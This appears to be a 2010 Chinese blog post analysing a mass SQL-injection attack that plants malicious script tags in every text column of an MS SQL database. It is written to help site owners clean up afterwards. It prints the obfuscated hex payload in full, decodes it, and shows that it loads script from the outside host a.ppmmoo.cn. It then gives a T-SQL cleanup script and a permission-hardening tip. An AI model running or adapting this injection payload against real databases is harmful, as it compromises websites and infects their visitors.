2010-4
10
文/饭
数据库批量挂马,已经成为挂马的一种主要方式,网上也有许多不同的挂马代码被站长们公布,大多形不同而意同,还有变异的直接突破waf的,再现了挂与反挂之间的激烈较量。ZZZzzz…. 情绪稳定的分析注入语句如下:
dEcLaRe @s vArChAr(8000) sEt @s= 0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e223e3c736372697074207372633d687474703a2f2f2536312532452537302537302536442536442536462536462532452536332536453e3c2f7363726970743e3c212d2d27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f52 eXeC(@s)-- |
利用了动态执行,对上次这段代码进行十六进制转换整理如下:
dEcLaRe @t vArChAr(255),@c vArChAr(255) –定义变量 dEcLaRe tAbLe_cursoR cUrSoR –游标 FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) –遍历表和字段 oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) –开始 bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(vArChAr,['+@c+']))+''</title>"><script src=http:// a.ppmmoo.cn ></script><!--''') –执行更新 fEtCh next FrOm tAbLe_cursoR iNtO @t,@c –游标指向下一记录 eNd –结束 cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR |
存在于syscolumns表里面的name是列名,xtype是数据类型,其与数字的对应关系是: xtype=99 'ntext' xtype=35 'text' xtype=231 'nvarchar' xtype=167 'varchar' 此语句执行的是意思是,遍历用户创建的表,搜索列类型为ntext,text, nvarchar,varchar的列,之后与定义的游标进行关联,再利用游标进行update操作。 写入内容“<script src="http://a.ppmmoo.cn"><!--mce:0--></script>”,完全成数据库批量挂马。 |
如图:
直接写个语句去掉所插入的语句
use tempdb; declare @t varchar(555),@c varchar(555) ,@inScript varchar(8000) set @inScript='<script src="http://"><!--mce:1--></script>' declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=replace(cast(['+@c+'] as varchar(8000)),'''+@inScript+''','''')' ) fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor; |
清理完后,可以对数据库对象sysobjects、syscolumns的select权限去掉,防止这样的重复劳动SSSsss...
[...] 永久链接 : http://www.nuanyue.com/%e6%b8%85%e7%90%86%e6%95%b0%e6%8d%ae%e5%ba%93%e6%89%b9%e9%87%8f%e6%8 [...]
来顶顶,传说的饭总
呵,谢谢!